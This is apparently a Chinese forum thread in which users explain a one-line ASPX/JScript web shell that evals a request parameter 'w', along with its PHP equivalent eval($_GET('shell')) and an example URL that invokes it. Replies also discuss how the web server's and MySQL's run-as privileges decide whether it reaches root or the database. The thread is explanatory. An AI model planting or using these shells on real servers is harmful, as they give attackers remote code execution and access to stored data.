在网络上看到这个东东
<%@ Page Language="Jscript" validateRequest="false"
%><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
挺有趣的，有大神可以解释这一行作用吗，感谢。

嗯，这句话真长...eval是个可以把接收到的字串转成code的函式，所以今天这个程式收到一个Request，可能是get也可能是post吧，传来了一个变量叫作w，而我们在这个w中可以放入程式码，然后他就会执行，是说仔细看看，这样应该算是两句话...真正一句话木马---> eval($_GET('shell'));要执行时像是这样 foo.com/index.php?shell="echo 'atk';"我打了好多字... 我可以转CyberSecure板嘛？

一句话木马都可以写成半本书了 XD

请教st大 所以这个w算是拿到os的root shell吗? 也能执行任何数据库的捞取?

嗯，没意见，应该是可以转，晚点转转这个w有没有取得root权限要看被注入木马的档案本身的权限，一般而言，普通的档案是不会有root权限的，如果操作正常...我是有听说过有不少人没事就给PHPmyadmin root 然后被人用这个REC时就Q了XDDD以PHP为例，通常没有意外的话，一个PHP是可以捞取DB，如果没有特别控管是可以执行任何数据库的捞取没错不过专业点的会把DB分段，这时就只能捞有权限的那段了是说我有些用词没有很精确，不要太在意>"<

楼上怪怪的.. 该说执行木马者的执行权限吧?虽然备注入木马的.php是ooxx:ooxx但如果apache是root执行,还是会拿到root权限.. 同样的, 如果从mysql执行系统指令,看的就是mysql的服务是谁启动的, 如果用appserv, 全部跑administrator当然就... ((请自行想像..然后楼上提到拿到一句话的权限是否能不能捞DB..如果DB另外有设密码, 就要另外破密码..回文好了..

嗯，对啊，所以我说我说的不精确